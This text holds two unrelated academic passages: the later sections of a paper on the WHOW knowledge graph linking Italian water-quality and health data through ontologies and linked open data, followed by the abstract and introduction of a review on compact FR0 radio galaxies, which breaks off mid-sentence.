We implemented the validation in the _ontology testing_ activity. This was done by converting the defined CQs into SPARQL and executing the latter as unit tests with toy data, following the solution defined in [4]. The ontology development we applied is modular (cf. the activity named ontology module development), allowing us to generate a set of networked ontologies. Each ontology of the network is a separate module designed with the purpose of minimising coupling with other ontology modules and maximising the internal cohesion of its conceptualisation. The re-use of external ontologies and ODPs was done by applying both the direct and the indirect approach [17; 5]. Direct re-use is about embedding individual entities or importing implementations of ODPs or other ontologies in the network, thus making it highly dependent on them. Instead, indirect re-use is about applying relevant entities and patterns from external ontologies as templates, by reproducing them in the ontologies of the network and providing possible extensions.

Figure 1: Methodology implemented for constructing the WHOW-KG.

We opted for direct re-use in the case of widely adopted vocabularies, such as SKOS, the Time ontology available in the Italian national catalog of semantic assets for public administrations18, aligned with the W3C time ontology, and the top-level19 (TOP) and environmental monitoring facilities20 (EMF) ontologies of the Linked ISPRA project21. TOP is used as a top-level ontology that provides general concepts and relations, whilst EMF provides core domain concepts and relations for modelling environmental monitoring data. On the contrary, we opted for the indirect approach for re-using patterns and to support interoperability with other pertinent ontologies, e.g. SSN/SOSA22 [14]. The latter case was realised by means of alignment axioms, such as rdfs:subClassOf and owl:equivalentClass, in dedicated alignment ontologies. Footnote 18: [https://schema.gov.it](https://schema.gov.it) Footnote 19: [https://github.com/whow-project/semantic-assets/blob/main/ispara-ontology-network/top/latest/top.rdf](https://github.com/whow-project/semantic-assets/blob/main/ispara-ontology-network/top/latest/top.rdf). Footnote 20: [https://github.com/whow-project/semantic-assets/blob/main/ispara-ontology-network/inspire-mf/latest/inspire-mf.rdf](https://github.com/whow-project/semantic-assets/blob/main/ispara-ontology-network/inspire-mf/latest/inspire-mf.rdf). Footnote 21: [https://dati.ispmbiente.it/](https://dati.ispmbiente.it/) Footnote 22: [https://www.w3.org/TR/vocab-ssn/](https://www.w3.org/TR/vocab-ssn/). Footnote 23: [https://rml.io/specs/rml/](https://rml.io/specs/rml/). Footnote 24: [https://www.w3.org/TR/r2rml/](https://www.w3.org/TR/r2rml/). Footnote 25: [https://github.com/whow-project/datasets](https://github.com/whow-project/datasets). Footnote 26: [https://github.com/RMLio/rmlmapper-java](https://github.com/RMLio/rmlmapper-java) Footnote 27: [https://github.com/anuzzolese/pyrml/](https://github.com/anuzzolese/pyrml/).

_Linked Open Data production._ Once the ontology network is modelled, the next step in the methodology aims at populating the KG with Linked Open Data (LOD) gathered from the identified input data sources (cf. Table 1). The LOD production was performed by means of declarative mappings. Hence, in the activity _mapping development_ we defined those mappings by means of the RDF Mapping Language23 [10] (RML), which extends the W3C-standardised mapping language R2RML24 to support the mapping of different kinds of structured data sources to RDF. 
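To make the CQ-driven testing described above concrete, the following minimal sketch shows a competency question executed as a SPARQL unit test against toy data with rdflib. The namespace, class, and property names are placeholders invented for illustration; they are not the actual WHOW vocabularies, and this is not the project's test harness.

```python
from rdflib import Graph, Literal, Namespace, RDF, XSD

# Purely illustrative namespace and terms: the real WHOW modules and properties
# are those defined in the ontology network (Section 3), not these placeholders.
EX = Namespace("https://example.org/whow-toy/")

# Toy data standing in for the toy dataset used during ontology testing.
g = Graph()
obs = EX["observation/1"]
g.add((obs, RDF.type, EX.WaterObservation))
g.add((obs, EX.hasMeasuredValue, Literal("0.05", datatype=XSD.decimal)))

# CQ: "Which water observations report a measured value?" rewritten as SPARQL.
cq_query = """
PREFIX ex: <https://example.org/whow-toy/>
SELECT ?obs ?value WHERE {
  ?obs a ex:WaterObservation ;
       ex:hasMeasuredValue ?value .
}
"""

# The unit test simply checks that the query is answerable over the toy data.
rows = list(g.query(cq_query))
assert rows, "CQ not satisfiable: the ontology/toy data do not cover the requirement"
for obs_uri, value in rows:
    print(obs_uri, value)
```

In the project, the same kind of query is run first against toy data during ontology testing and later against the data produced by the declarative mappings, which are maintained as separate artefacts, as described next.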
All the RML mapping rules defined are available on the project's GitHub repository25. These mappings were processed with both RMLMapper26 and pyRML27. The latter is a lightweight Python engine for processing RML files, designed and implemented in the context of the project. Data validation was then performed by using the same SPARQL unit tests derived from CQs. We point out that in the latter case the unit tests were executed on real data. The activities related to data production are meant to be executed in a decentralised and distributed fashion, in which different data providers might use their data and RML mapping rules independently.

## 3 Results

### Ontology Network

The WHOW ontology network consists of 8 ontology modules. In Figure 2 each ontology is represented as a circle, whilst the arrows represent owl:imports axioms among the ontologies. The ontologies represented as white circles are external ontologies we re-used with the direct approach. The ontologies represented as gray circles are the novel contributions. The base namespace defined for the novel ontologies is [https://w3id.org/italia/whow/onto/](https://w3id.org/italia/whow/onto/). From this base namespace each module defines its local namespace following the table of prefixes reported in Figure 2. Table 2 reports core metrics about the ontology network, which is: (i) under version control on GitHub28; (ii) shared on Zenodo29 with a CC-BY 4.0 International licence; and (iii) findable on Linked Open Vocabularies30. Footnote 28: [https://github.com/whow-project/semantic-assets/tree/main/ontologies](https://github.com/whow-project/semantic-assets/tree/main/ontologies). Footnote 29: [https://doi.org/10.5281/zenodo.7916179](https://doi.org/10.5281/zenodo.7916179). Footnote 30: [https://lov.linkeddata.es/dataset/lov/](https://lov.linkeddata.es/dataset/lov/).

Figure 2: The WHOW ontology network.

In the _Hydrography_ ontology we reused the PartOf ODP33 for expressing parthood between water basins (cf. the object property hydro:isSubWaterBasin). Footnote 33: [http://ontologydesignpatterns.org/wiki/Submissions:PartOf](http://ontologydesignpatterns.org/wiki/Submissions:PartOf).

Figure 3: The Hydrography ontology.

Water Monitoring module. The _Water Monitoring_ ontology is identified by the prefix w-mon:34. It provides means to represent observations related to the quality of water courses, such as chemical and biological substances found in water bodies. The requirements for the representation of water observations are defined according to the data provided by the data providers involved in the project and the standards and directives in terms of observations and water-related assessments. For what concerns the representation of water observations, it is possible to refer to European directives: (i) those deriving from taxonomies from European Directive 98/83/CE (and subsequent ones)35, confirmed by the Italian Ministry of Health36, concerning parameters of the waters for human consumption, and (ii) those deriving from the European Directive 2009/90/EC37, concerning parameters of surface waters. Thus, water quality monitoring requires the integration of heterogeneous types of both observations and observation objects derived from samplers. As a result, in the ontology (cf. Figure 4), a w-mon:WaterObservation is divided into w-mon:DrinkingWaterObservation, w-mon:SurfaceOrGroundWaterObservation, and w-mon:RadioActivityObservation, which are, in turn, further divided into subclasses based on the specific parameter being observed. 
In fact, the observations that have a microbiological agent or a chemical substance as their object monitor it through its concentration in the water. On the contrary, observations on properties of water, such as hardness, density or pH, do not imply the presence of an object being observed, since no chemical substance or microbiological agent is involved there. The ontology follows the Stimulus-Sensor-Observation Ontology Design Pattern (SSO ODP) [15], which is a standard for the Infrastructure for Spatial Information in Europe [8], and the Specimen model of ISO 19156:201138, which outlines the properties of sampling process features. Footnote 35: [https://eur-lex.europa.eu/legal-content/EN/ALL/?uri=CELEX:31998L0083](https://eur-lex.europa.eu/legal-content/EN/ALL/?uri=CELEX:31998L0083). Footnote 36: Water quality parameters published by Italian Ministry of Health: [https://www.salute.gov.it/portale/temi/p2_6.jsp?lingua=italiano&id=4464&area=acque_potabili&menu=co](https://www.salute.gov.it/portale/temi/p2_6.jsp?lingua=italiano&id=4464&area=acque_potabili&menu=co). Footnote 37: [https://eur-lex.europa.eu/legal-content/EN/TXT/HTML/?uri=CELEX:32000L0060&rid=2](https://eur-lex.europa.eu/legal-content/EN/TXT/HTML/?uri=CELEX:32000L0060&rid=2). Footnote 38: [http://www.iso.org/iso/catalogue_detail.htm?csnumber=32574](http://www.iso.org/iso/catalogue_detail.htm?csnumber=32574).

Figure 4: The Water Monitoring ontology.

#### Water Indicator module.

The **Water Indicator** ontology, with prefix w-ind:39, re-uses the Indicator ontology design pattern40 defined in OntoPiA41, which is the Italian national network of ontologies and controlled vocabularies. This pattern is re-used to address indicators and metrics for the indicator calculation of water quality. As shown in Figure 5, the indicators can be bathing water quality classes or indicators of lakes' chemical status.

Weather Monitoring module. Similarly to the Water Monitoring module, the _Weather Monitoring_ ontology, with prefix wh-mon:42 (cf. Figure 6), has its focus on a wh-mon:WeatherObservation related to a wh-mon:WeatherFeatureOfInterest (either ground-level soil, air, wind, snow or rainfall), a wh-mon:WeatherObservableProperty and a wh-mon:WeatherSensor hosted by a wh-mon:WeatherStation. It reuses the ISPRA ontology network to model observations and related properties. This model is meant to address the need to represent weather observations that could serve as a basis to derive information on extreme events monitoring and prediction, such as rainfalls and snow levels. Footnote 42: The prefix wh-mon: stands for the namespace [https://w3id.org/whow/onto/weather-monitoring](https://w3id.org/whow/onto/weather-monitoring).

Health Monitoring module. Finally, the _Health Monitoring_ ontology, whose prefix is hm:43, reuses the OntoPiA Indicator ontology and focuses on the representation of health indicators coming from regional healthcare facilities. Examples include drug distribution rates and hospital accesses according to disease code and facility involved (cf. Figure 7). Different types of hm:HealthcareIndicatorCalculation are defined, based on the typology of indicator they describe, i.e. infectious disease rate, death rates related to diagnosis, average hospital stay and drug distribution. 
The indicator calculation also refers to a statistical dimension class, hm:ClinicalCohort, which specifies the population referred to, as defined by a number of criteria (hm:CohortCriteriaDescription), such as age and gender. By reusing the ispra-top: ontology, it is also possible to model the health agency that supervises a specific area.

Figure 5: The Water Indicator ontology.

Figure 6: The Weather Monitoring ontology.

Figure 7: The Health Monitoring ontology.

### Linked Open Data

We produced the Linked Open Data from two data providers, i.e. ISPRA and ARIA, as reported in Table 1, by executing the RML mappings as described in Section 2.2. Hence, we generated two linked open datasets, that is, one from the data provided by ISPRA and the other from the data provided by ARIA. The ownership of the generated linked datasets, along with their corresponding maintenance effort, is kept by the data providers. This fits the requirement of WHOW to create and maintain a knowledge graph following a decentralised and distributed paradigm. In this scenario, new data providers might publish their data as linked open data compliant with the WHOW ontology network by using their preferred persistent URIs and setting up their own SPARQL endpoint, thus maximising the sustainability of the WHOW-KG. In this regard, ISPRA identified [https://w3id.org/italia/env/ld/](https://w3id.org/italia/env/ld/) as its reference namespace. Accordingly, the pattern [https://w3id.org/italia/env/ld/](https://w3id.org/italia/env/ld/){_type_}/{_id_} was applied for producing RDF resources, where {_type_} and {_id_} are placeholders for an entity type (e.g. water-sample) and its local identifier (e.g. 45.60555-13.72195), respectively. The RDF data produced by ISPRA can be queried through their dedicated SPARQL endpoint44 and are available as a single dump on Zenodo45 for download with a CC-BY 4.0 International licence. Similarly, ARIA identified [https://w3id.org/italia/lombardia/data/](https://w3id.org/italia/lombardia/data/) as its reference namespace. Also in this case, the pattern [https://w3id.org/italia/lombardia/data/](https://w3id.org/italia/lombardia/data/){_type_}/{_id_} was applied for producing RDF resources with the same rationale as before. Again, the RDF data produced by ARIA can be queried via SPARQL46 and are available on Zenodo47 for download with a CC0 licence. Finally, three controlled vocabularies were produced from the data provided by ARIA. These vocabularies provide term definitions for: (i) chemical substances48; (ii) diseases49; and (iii) water indicators50. In the case of controlled vocabularies we opted for a namespace not depending on the specific data provider, i.e. [https://w3id.org/whow/controlled-vocabulary/](https://w3id.org/whow/controlled-vocabulary/). This namespace was used for producing RDF resources by applying the pattern [https://w3id.org/whow/controlled-vocabulary/](https://w3id.org/whow/controlled-vocabulary/){_name_}/{_id_}, where {_name_} and {_id_} are placeholders for the vocabulary name (e.g. chemical-substances) and the term local identifier (e.g. cas-102851-06-9), respectively. The controlled vocabularies are available on Zenodo51 and can be queried via SPARQL52. The WHOW-KG counts 52,943,768 triples in the linked dataset generated by ISPRA, 47,628,449 triples in the linked dataset generated by ARIA, and 16,350 triples in the controlled vocabularies. 
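As a small illustration of the IRI minting patterns just described, a tiny helper (hypothetical, not part of the project code base) can apply the {_type_}/{_id_} and {_name_}/{_id_} conventions, reusing the example placeholders given above:

```python
def mint_iri(base: str, entity_type: str, local_id: str) -> str:
    """Apply the {base}{type}/{id} pattern described above to build a resource IRI."""
    return f"{base.rstrip('/')}/{entity_type}/{local_id}"

# Examples built from the patterns and placeholders mentioned in the text.
print(mint_iri("https://w3id.org/italia/env/ld/", "water-sample", "45.60555-13.72195"))
# -> https://w3id.org/italia/env/ld/water-sample/45.60555-13.72195
print(mint_iri("https://w3id.org/whow/controlled-vocabulary/", "chemical-substances", "cas-102851-06-9"))
# -> https://w3id.org/whow/controlled-vocabulary/chemical-substances/cas-102851-06-9
```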
Footnote 46: [http://18.102.46.55:18890/sparql](http://18.102.46.55:18890/sparql). Footnote 47: [https://doi.org/10.5281/zenodo.7916732](https://doi.org/10.5281/zenodo.7916732) Footnote 48: [https://github.com/whow-project/semantic-assets/blob/main/controlled-vocabularies/chemical-substances/chemical-substances.ttl](https://github.com/whow-project/semantic-assets/blob/main/controlled-vocabularies/chemical-substances/chemical-substances.ttl). Footnote 49: [https://github.com/whow-project/semantic-assets/blob/main/controlled-vocabularies/diseases/diseases.ttl](https://github.com/whow-project/semantic-assets/blob/main/controlled-vocabularies/diseases/diseases.ttl) Footnote 50: [https://github.com/whow-project/semantic-assets/blob/main/controlled-vocabularies/water-indicators/water-indicators.ttl](https://github.com/whow-project/semantic-assets/blob/main/controlled-vocabularies/water-indicators/water-indicators.ttl). Footnote 51: [https://doi.org/10.5281/zenodo.7919460](https://doi.org/10.5281/zenodo.7919460). Footnote 52: [https://semscout.istc.cnr.it/sparql/](https://semscout.istc.cnr.it/sparql/). Footnote 53: [https://eur-lex.europa.eu/legal-content/EN/TXT/HTML/?uri=CELEX:52019IP0220&from=EN](https://eur-lex.europa.eu/legal-content/EN/TXT/HTML/?uri=CELEX:52019IP0220&from=EN) Footnote 54: [https://blogs.worldbank.org/digital-development/sustainable-development-goals-and-open-data](https://blogs.worldbank.org/digital-development/sustainable-development-goals-and-open-data).

## 4 Impact, versioning, and licensing

_Impact._ The UN Sustainable Development Goal (SDG) no. 6 on clean water and sanitation requires investing in adequate infrastructure, providing sanitation facilities, and encouraging hygiene. The importance of considering the UN Sustainable Development Goals (SDGs) in the context of open data emerges in several contexts. Notable is the European Parliament resolution of 14 March 2019 on the Annual strategic report on the implementation and delivery of the SDGs (2018/2279(INI))53, where a precise call on the Commission is mentioned in order to add data related to the SDGs to the high-value datasets as defined in the directive on open data and public sector information, encouraging the Member States to publish all reports on the SDGs under a free license. The World Bank Group, in a blog post54 from as far back as 2015, explicitly highlights that "Open Data can help achieve the SDGs by providing critical information on natural resources, government operations, public services, and population demographics". To this end, the WHOW-KG embodies fine-grained thematic indicators that have been identified by data providers and co-creators of the WHOW project according to the three use cases and their legislative bases. We recorded evidence, by means of the co-creation programme, that the WHOW-KG is of utmost importance to the community encompassing decision makers, practitioners, and data providers in the area of water quality and sanitation. As a matter of fact, 77 individuals contributed to the co-creation programme from different EU countries.

_Versioning and Licensing._ The WHOW-KG is under version control on GitHub55. The ontology network, controlled vocabularies and linked dataset produced by ISPRA are released with a CC-BY 4.056 licence. Instead, the linked dataset produced by ARIA is released with a CC057 licence. 
Footnote 55: [https://github.com/whow-project/semantic-assets](https://github.com/whow-project/semantic-assets) Footnote 56: [https://creativecommons.org/licenses/by/4.0/](https://creativecommons.org/licenses/by/4.0/). Footnote 57: [https://creativecommons.org/publicdomain/zero/1.0/](https://creativecommons.org/publicdomain/zero/1.0/) ## 5 Related work In the context of the monitoring a pillar is the Semantic Sensor Network Ontology (SSN Ontology)[7]. It allows one to represent sensors and observational processes and implements, for the majority of its semantic elements, the ISO 19156 Observations and Measurements (O&M) standard, used also as reference model in the INSPIRE context. Other European projects target water monitoring data models. This is the case of the ODALA58 project that created the ODALA Air & Water application profile59. The profile builds on a core module derived from both O&M and the SSN Ontology. ODALA presents concepts similar to those defined in the WHOW water monitoring ontology; this creates the prerequisites for a semantic alignment between these knowledge graphs. In the same direction, [18] describes a knowledge-based approach aiming at water quality monitoring and pollution alerting through the proposed Observational Process Ontology (OPO). Similarly, [9] presents a three-module water quality ontology that combines numerous standards from different domains to obtain a comprehensive approach to the issue. These standards are, among others, GeoSPARQL60, the O&M and SSN cited above, the RDF Data Cube61 as well as non-ontological resources associated with standards (WaterML62). At the European level, the European Environmental Agency publishes a Linked Open Data section63 that comprises data on water quality monitoring. This data is currently under investigation in order to enable possible links with the proposed WHOW knowledge graph. As far as the health domain is concerned, although it is difficult to find (linked) open data available for the re-use, interesting resources were taken into account when creating the WHOW-KG. In particular, we mention here the Snomed standard64 for health terms, that has been re-used in order to create proper links with our produced controlled vocabulary on infectious diseases. Footnote 64: [https://www.snomed.org/](https://www.snomed.org/). In essence, although a variety of works in both domains can be identified, it is still difficult, to the best of our knowledge, to get access to a resource capable of linking the two domains together as we propose with the WHOW-KG. ## 6 Conclusions and future work In this paper, we have introduced the Water Health Knowledge Graph (WHOW-KG) that links water quality observations with health parameters (e.g. infectious disease rates), thus implementing the well-known connection of water quality effects on people's health. The WHOW-KG is (i) distributed among different data providers, (ii) open to maximise re-use, (iii) multilingual in that labels and comments are provided in both Italian and English, when possible, and (iv) built according to FAIR principles, applied to both ontologies and linked open data. The WHOW-KG is continuously evolving with further datasets. The aim, in fact, is to provide a resource that can self-sustain and feed itself beyond the duration of the European WHOW project in which it was conceived. In this context, we are planning a number of activities to further increase the visibility of the knowledge graph and its use for any purpose of interest. 
Firstly, we are defining SHACL shapes, starting from the OWL restrictions defined in the ontology network, to support the overall validation phase of the proposed methodology. Secondly, in order to open ourselves up to a wider audience of possible developers, part of our future work is to define rest APIs based on the semantics defined through the ontology network. Thirdly, in order to maximise the possibilities of re-use in a wider European context, we will exploit services such as eTranslation65 to provide additional languages for datasets and ontologies, making the knowledge graph understandable to possible stakeholders from different European countries. Finally, the knowledge graph will be made available through a series of national and European platforms. In fact, we plan to publish the linked open datasets in the Italian national catalogue of open data, thanks to the implementation of the DCAT-AP metadata profile, and from there to data.europa.eu. As for the ontologies we are planning to require their inclusion in the Italian national catalogue of semantic assets named schema.gov.it. Footnote 65: [https://commission.europa.eu/resources-partners/etranslation](https://commission.europa.eu/resources-partners/etranslation). ## Acknowledgements This work has been supported by the Water Health Open knoWledge (WHOW) project co-financed by the Connecting European Facility programme of the European Union under grant agreement INEA/CEF/ICT/A2019/206322.
2307.08379
The nature of compact radio sources: the case of FR0 radio galaxies
Radio-loud compact radio sources (CRSs) are characterised by morphological compactness of the jet structure centred on the active nucleus of the galaxy. Most of the local elliptical galaxies are found to host a CRS with nuclear luminosities lower than those of typical quasars, $\lesssim$10$^{42}\, {\rm erg\, s}^{-1}$. Recently, low-luminosity CRSs with a LINER-like optical spectrum have been named Fanaroff-Riley (FR) type 0 to highlight their lack of substantially extended radio emission at kpc scales, in contrast with the other Fanaroff-Riley classes, full-fledged FRIs and FRII radio galaxies. FR0s are the most abundant class of radio galaxies in the local Universe, and characterised by a higher core dominance, poorer Mpc-scale environment and smaller (sub-kpc scale, if resolved) jets than FRIs. However, FR0s share similar host and nuclear properties with FRIs. A different accretion-ejection paradigm from that in place in FRIs is invoked to account for the parsec-scale FR0 jets. This review revises the state-of-the-art knowledge about FR0s, their nature, and which open issues the next generation of radio telescopes can solve in this context.
Ranieri D. Baldi
2023-07-17T10:33:54Z
http://arxiv.org/abs/2307.08379v1
# The nature of compact radio sources: the case of FR0 radio galaxies

###### Abstract

Radio-loud compact radio sources (CRSs) are characterised by morphological compactness of the jet structure centred on the active nucleus of the galaxy. Most of the local elliptical galaxies are found to host a CRS with nuclear luminosities lower than those of typical quasars, \(\lesssim\)\(10^{42}\,{\rm erg\,s^{-1}}\). Recently, low-luminosity CRSs with a LINER-like optical spectrum have been named Fanaroff-Riley (FR) type 0 to highlight their lack of substantially extended radio emission at kpc scales, in contrast with the other Fanaroff-Riley classes, full-fledged FR Is and FR II radio galaxies. FR 0s are the most abundant class of radio galaxies in the local Universe, and characterised by a higher core dominance, poorer Mpc-scale environment and smaller (sub-kpc scale, if resolved) jets than FR Is. However, FR 0s share similar host and nuclear properties with FR Is. A different accretion-ejection paradigm from that in place in FR Is is invoked to account for the parsec-scale FR 0 jets. This review revises the state-of-the-art knowledge about FR 0s, their nature, and which open issues the next generation of radio telescopes can solve in this context.

Keywords: Galaxies: active; Galaxies: jets; Radio continuum: galaxies

Footnote †: journal: The Astronomy and Astrophysics Review 
Extended RGs are morphologically classified, following Fanaroff and Riley (1974), into core-brightened sources, named type I (FR Is), and edge-brightened sources, named type II (FR IIs): the latter are generally more radio luminous (\(>2\times 10^{25}\,{\rm W\,Hz}^{-1}\) at 178 MHz) than the former. Extended plumes, lobes, and tails account for typically 90% of their total radio emission (Miley, 1980). Other than the radio linear size and morphology, the jet orientation with respect to the line of sight is another important variable to characterise RLAGN: extended sources inclined at small angles may appear compact due to projection effects and their radio emission can be boosted due to relativistic beaming of the nuclear jets moving at relativistic velocities. A further crucial aspect of RLAGN is the radio spectrum (the flux density \(S_{\nu}\) varies with frequency \(\nu\) as \(\nu^{-\alpha}\), where \(\alpha\) is the spectral index): steep-spectrum sources (\(\alpha>0.5\)) are typically associated with optically-thin emission from extended jets, while flat/inverted-spectrum sources (\(\alpha<0.5\)) are largely due to (synchrotron-self or free-free) absorption processes involved in compact cores and jet knots. While misaligned (type-2) RLAGN (with respect to the line of sight, e.g. FR I/II), commonly named radio galaxies (RGs), are typically dominated by their extended emission with steep spectra, aligned (type-1) RLAGN, named blazars2, show flat, inverted or complex radio spectra of the dominant cores. Footnote 2: The blazar population consists of two sub-classes, the flat-spectrum radio quasars and the BL Lacs, generally at high and low luminosities, respectively. Traditionally, compact radio sources (CRSs) associated with misaligned RLAGN are believed to represent the early stages of evolution of full-fledged RLAGN (FR I/IIs, O'Dea 1998) and are characterised by a peaked radio spectrum (see Sect. 2). Recently, Baldi et al. (2015) introduced a new class of _low-power CRSs_ (\(\lesssim 10^{24}\,{\rm W\,Hz}^{-1}\)), named _FR 0_ RGs, whose compact radio emission is dominated by the core and pc-scale jets and is not related to juvenile radio activity. The characteristic property of such an abundant class of RGs is the substantial lack of kpc-scale jet emission, which has changed the classical view of the kpc/Mpc-scale RLAGN phenomenology, particularly at low luminosities, where jets are scarcely studied. An increasingly incomplete list of RLAGN classes is given in Table 1. The complex radio taxonomy of RLAGN needs to find a correspondence with the optical classification schemes related to the modes of accretion onto the BHs (e.g., Jackson and Rawlings, 1997; Heckman and Best, 2014; Hardcastle and Worrall, 2000). Based on their optical spectra, RGs have been classified into Low Excitation Radio Galaxies (LERGs) and High Excitation Radio Galaxies (HERGs) (Tab. 1), which basically reflect two BH accretion states (Buttiglione et al., 2010; Tadhunter, 2016a) with distinct distributions of Eddington ratios3. 
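As a brief aside on the spectral-index convention introduced above (\(S_{\nu}\propto\nu^{-\alpha}\)), the following minimal sketch, with purely illustrative flux densities, computes a two-point spectral index and applies the steep versus flat/inverted threshold at \(\alpha=0.5\):

```python
import math

def spectral_index(s1, nu1, s2, nu2):
    """Two-point spectral index alpha, defined through S_nu proportional to nu**(-alpha)."""
    return -math.log(s2 / s1) / math.log(nu2 / nu1)

# Illustrative flux densities (arbitrary units) measured at 1.4 and 5 GHz.
alpha = spectral_index(s1=100.0, nu1=1.4e9, s2=40.0, nu2=5.0e9)
print(f"alpha = {alpha:.2f}")                      # ~0.72 for these numbers
print("steep" if alpha > 0.5 else "flat/inverted")  # threshold used in the text
```

Returning to the two accretion states associated with the LERG/HERG division: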
LERGs are typically accreting below 1% of their Eddington accretion rate limit, while HERGs have typical accretion rates between 1 and 10% (or even higher) (Heckman and Best, 2014). HERGs, accretion-dominated RLAGN, are characterized by radiatively efficient accretion flows (REAF), i.e. standard optically thick, geometrically thin discs (Shakura and Sunyaev, 1973). LERGs, jet-dominated RLAGN, are powered by radiatively inefficient accretion flows (RIAF), which include the disc solutions of geometrically thick advection dominated accretion flows (ADAF) (e.g., Narayan and Yi 1994a, 1995; Narayan et al. 2000; Yuan and Narayan 2014). LERGs prefer redder, gas-poorer, more massive ETGs with lower star-formation rates, which inhabit richer and more dynamically relaxed environment and feed more massive BHs than HERGs (Baldi and Capetti, 2008; Heckman and Best, 2014). LERGs are generally thought to be fuelled by the cooling of hot gas from haloes present in their massive host galaxies, whereas the HERGs generally tend to accrete cold gas efficiently, from processes external or internal to the galaxy (Hardcastle et al., 2007). Several radio-optical studies of RGs concluded that the two FR radio morphologies are not representative of two distinct accretion states, but can co-exist in the same optical class (e.g., Gendre et al. 2013; Mingo et al. 2019, 2022). In fact, local LERGs are associated with a FR I or FR II morphology, whereas HERGs, which are on average of higher luminosity, are generally FR IIs. The new low-power FR 0 class has thus further entangled, although already complex, the radio-optical classification scheme (Tab. 1). Other than radio and optical bands, decades of observations of accreting BHs at different wavelengths have shed new light on specific aspects of \begin{table} \begin{tabular}{l l r} \hline Acronyms & Main properties & Reference \\ \hline Quasar & Quasi-stellar radio source & 1 \\ RLAGN & radio-loud AGN (relativistic collimated jets) & 2 \\ RQAGN & radio-quiet AGN (thermal/non-thermal emission, uncollimated & 2,3 \\ & sub-relativistic jet) & \\ CRS & RL or RQ radio compact source & 4 \\ FR I & Fanaroff–Riley class I radio source; radio core-brightened & 5 \\ FR II & Fanaroff–Riley class II radio source; radio edge-brightened & 5 \\ FR 0 & Fanaroff–Riley class 0 radio source; RL CRS lacking kpc-scale extended emission & 6 \\ RG & Radio galaxy, misaligned RL AGN & 7 \\ Blazar & aligned RL AGN & 7 \\ REAF & radiatively-efficient accretion disc & 8 \\ RIAF & radiatively-inefficient accretion disc & 9 \\ LERG & Low-Excitation Radio galaxies & 10 \\ HERG & High-Excitation Radio galaxies & 10 \\ LLAGN & Low-luminosity AGN & 11 \\ CSS & Compact steep spectrum radio source; young RG & 12 \\ GPS & Gigahertz-peaked radio source; young RG & 12 \\ HPF & High frequency peakers; young RG & 12 \\ CSO & Compact symmetric object; young RG & 12 \\ MSO & Medium-sized symmetric object; young RG & 12 \\ Seyfert & High-ionisation nuclear emission-line regions, RQ AGN & 13 \\ LINER & Low-ionisation nuclear emission-line regions, RQ or RL AGN & 13,14 \\ CoreG & Core Galaxies, nearby low-luminosity FR 0-like RGs & 15 \\ \hline \end{tabular} The complex radio-optical AGN taxonomy includes several acronyms. Here a partial but helpful list of labels for AGN, their properties and references (first/key papers or recent papers, which give up-to-date details). References: 1. Schmidt (1963), 2. Padovani (2016), 3. Panessa et al. (2019), 4. Kellermann and Pauliny-Toth (1981), 5. 
Fanaroff and Riley (1974), 6. Baldi et al. (2015), 7. Urry and Padovani (1995), 8. Shakura and Sunyaev (1973) 9. Yuan and Narayan (2014), 10. Heckman and Best (2014), 11. Ho (2008), 12. O’Dea and Saikia (2021), 13. Kewley et al. (2006), 14. Heckman (1980), 15. Balmaverde and Capetti (2006a). \end{table} Table 1: Radio-optical AGN taxonomy the accretion-jet phenomena (e.g. X-ray, broad/narrow optical lines, IR excess), collecting evidence for an anisotropic AGN emission. The attempt to unify all the AGN classes in one single picture concluded with the Unification Model (UM, e.g. Barthel, 1989; Antonucci, 1993; Urry and Padovani, 1995), which states that, despite their differences, RLAGN have the same basic structure (attested for powerful sources): optically-thick circumnuclear matter (torus) obscuring the accretion disc in an edge-on view, perpendicular to a relativistic jet, Doppler boosted when seen at small angles to the line of sight. This orientation-based scheme represents the most courageous way to characterise the fact that the nuclear continuum and emission-line radiation from all types of AGN are simply a function of wavelength, inclination to the line of sight and source luminosity. However, the advent of modern sensitive and Figure 1: Radio power/linear-size plot (\(P\)—\(D\) diagram) for different types of RL and RQ AGN, adapted from plots presented by An and Baan (2012); Jarvis et al. (2019); Hardcastle and Croston (2020). Points show individual objects and coloured contours represent a smoothed estimator of source density. The different categories of source shown are: CSO, GPS, CSS, FR I, FR II, RQ quasars, Seyferts and LINERS, and FR 0s (see Sect. 1 and 2 for the definition of the classes). Red and dark-green dashed lines represents the classical evolutionary tracks of FR Is and FR IIs (e.g., An and Baan, 2012). The shaded bottom-right corner shows the effect of surface-brightness limitations by existing radio surveys: very recently, deep LOFAR and MeerKAT surveys are starting to explore this region of the \(P\)—\(D\) diagram (Whittam et al., 2022; Best et al., 2023). The vertical line roughly represents the separation between resolved and unresolved/compact sources based on arcsec angular resolution, generally provided by the VLA array. The black box depicts the VLA detected FR 0s and represents an upper limit on their actual radio physical size. This figure is a modified version of Fig. 2 from Hardcastle and Croston (2020). survey-mode telescopes has unveiled new regions in the space parameters of RLAGN phenomenology (see e.g., in time domain astronomy, radio/optical/X-ray spectroscopy and polarimetry, jet/wind structure, disc and dust properties, Padovani 2016; Padovani et al. 2017; Spinoglio and Fernandez-Ontiveros 2021), which have defined specific accretion-ejection states of AGN and relative transitions, which the simplistic UM cannot explain. Although the UM is still generally valid, the most logical way to relieve the tension is the inclusion of the time variable in the UM, i.e. the parameters can evolve across time. An evolutionary scheme of RLAGN offers a more adaptable method to fine-tune the AGN parameters observed in distinct and transitioning states of accretion and ejections (Antonucci, 2012; Netzer, 2015; Tadhunter, 2016). The dynamic evolution of the accretion-ejection coupling in RLAGN is traditionally explained as a progression of the radio power with the linear size of the radio structure (see An and Baan 2012 and references therein). 
Figure 1 shows the radio power \(P\) versus the total extent of the source, \(D\) (the so-called "\(P\)--\(D\)" diagram, Baldwin 1982): different populations of radio-emitting AGN (quiet and loud) span a very wide range in radio luminosities (nearly ten orders of magnitude) and source sizes (six orders of magnitude) (Hardcastle et al., 2019; Hardcastle and Croston, 2020). For RLAGN, in Fig. 1, two representative evolutionary tracks within the \(P\)--\(D\) diagram are shown and predict RL CRSs to evolve into traditional \(\sim\)100-kpc double RGs (FR Is or FR IIs, e.g. Kunert-Bajraszewska et al. 2010; An and Baan 2012; Kunert-Bajraszewska 2016). However, there is an important caveat. All the evolutionary models and our current knowledge on RG populations have long been based on samples of powerful sources, mostly above \(10^{24}\,\mathrm{W\,Hz}^{-1}\), selected from high-flux low-frequency radio surveys such as the Third Cambridge (3C) catalogue (Bennett, 1962). In contrast with the past, recent large-area sensitive surveys have revealed that the local RG population is dominated by sources with radio power below \(10^{24}\,\mathrm{W\,Hz}^{-1}\) (Best and Heckman, 2012), which includes mostly compact FR 0-type RGs. The UM is not able to successfully reproduce such an abundant population of 